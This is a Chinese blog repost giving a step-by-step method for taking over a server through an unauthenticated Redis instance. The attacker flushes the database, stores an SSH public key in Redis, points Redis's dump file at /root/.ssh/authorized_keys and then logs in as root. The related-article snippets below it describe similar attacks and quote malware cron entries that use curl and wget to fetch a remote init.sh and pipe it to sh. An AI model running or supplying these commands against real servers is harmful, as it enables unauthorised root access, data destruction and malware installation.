通过redis入侵服务器的步骤

最新推荐文章于 2022-08-22 14:10:12 发布
最新推荐文章于 2022-08-22 14:10:12 发布
阅读量454 收藏 1
点赞数
文章标签: 数据库 运维 python
原文链接:https://my.oschina.net/lenglingx/blog/532185
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

转载于:https://my.oschina.net/lenglingx/blog/532185

weixin_34257076
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
redis缓存服务器
12-28
通过理解这些基本概念和特性,你可以根据实际需求有效地利用 Redis 缓存服务器来优化应用程序性能,提高系统响应速度,并确保数据的安全性和一致性。无论是在 web 应用、数据统计、实时分析还是消息传递等领域,...
Redis服务器
09-29
而"redis 免安装版"则为用户提供了一种便捷的方式,在Windows上直接运行Redis服务,无需复杂的安装步骤Redis服务器的核心特性包括: 1. **内存存储**:Redis所有的数据都存储在内存中,这使得其读写速度极快,但...
redis之手入侵服务器
运维724
03-07 389
说明 利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。 原理 远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。 入侵演示 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可 bind 0.0.0.0 #允...
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6261
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
利用redis入侵服务器
weixin_43641575的博客
01-17 676
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis数据库文件配置,把数据写入到认证文件。形成免密码登陆。 一,生成本地ssh公钥 ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面 二,先连接redis看看 telnet 10.10.10.102 6379...
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 856
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
记一次Redis漏洞导致服务器入侵以及解决的过程
orisonchan的博客
08-09 2655
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
redis服务器,直接服务打开
最新发布
03-10
"redis服务器,直接服务打开"这个标题暗示我们将讨论如何启动和管理Redis服务器。 **Redis的基本概念:** 1. **键值对(Key-Value)存储**:Redis的核心是键值对模型,其中键是唯一的字符串,值可以是多种数据类型...
windows下redis服务器
03-17
通过这些命令,你可以与Redis服务器进行交互。 7. **数据持久化**: Redis支持RDB(快照)和AOF(日志)两种持久化方式。RDB会在指定时间点生成数据快照保存到磁盘,而AOF记录每次写操作的日志。通过配置`save`和`...
Redis 服务器
03-06
- **监控与报警**:通过Redis内置的INFO命令获取服务器状态,配合外部监控工具进行性能和故障报警。 总之,Redis作为一个强大的键值存储系统,在Windows上的部署和使用相对简单,其丰富的数据结构和高性能特性使其...
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2142
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3862
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
利用Redis配置漏洞黑进linux服务器(被黑过一次,特出此警告贴)
weixin_43783160的博客
11-24 464
参考博客: http://www.zhoulingjie.com/archives/1140 漏洞描述 1、借助 redis 内置命令,可以对现有数据进行恶意清空 2、 如果 redis 以root身份运行,可往服务器上写入SSH公钥文件,直接登录服务器 漏洞原理 如果redis端口对外网开放,且未配置安全密码访问(或泄露); 当 redis 以root用户身份运行时,就可以借助链接到redis,通过redis内置命令修改 dir和 dbfilename 从而可往服务器的任何位置写入任何内容的文件,当
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1255
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt# re...
Redis 也能被攻击?一次Redis入侵的记录
探索云原生
12-05 5543
通过 RDB 方式入侵Redis 被攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
Centos上由于redis漏洞被攻击
半僧
12-06 1752
早上一直收到腾讯云报警,查看了下: 有个yam程序,占用大量CPU!!! 真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的? 于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的
Java调用Jenkins API获取任务构建归档文件
建伟博客
03-14 4234
Centos 清除wnTKYg 删除挖矿病毒 redis漏洞
服务器 redis入侵
beyond__devil的博客
09-04 822
这几天服务器上的 redis,出现了一个比较严重的问题: 程序返回错误: MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please ch...
redis客户端 服务器
09-11
你想了解关于Redis客户端和服务器的信息吗?Redis是一种快速、开源的内存键值存储系统,它提供了一个客户端-服务器架构。Redis服务器是一个运行在后台的进程,负责处理客户端请求、管理内存和数据持久化等任务。而Redis客户端则是与服务器进行通信的应用程序或工具。 Redis客户端可以通过不同的编程语言实现,比如Java、Python、Node.js等。它们提供了一套API或命令行工具,用于与Redis服务器进行交互。通过客户端,你可以发送各种命令给服务器,比如设置键值对、获取值、执行事务和发布订阅等操作。 Redis服务器则负责接收客户端发送的请求并执行相应的操作。它会在内存中保存数据,因此可以快速地读写键值对。此外,Redis还支持数据持久化,可以将内存中的数据定期写入到磁盘上,以保证数据的安全性。 总之,Redis客户端和服务器共同构成了一个完整的Redis系统,使得开发者可以方便地使用Redis进行数据存储和操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值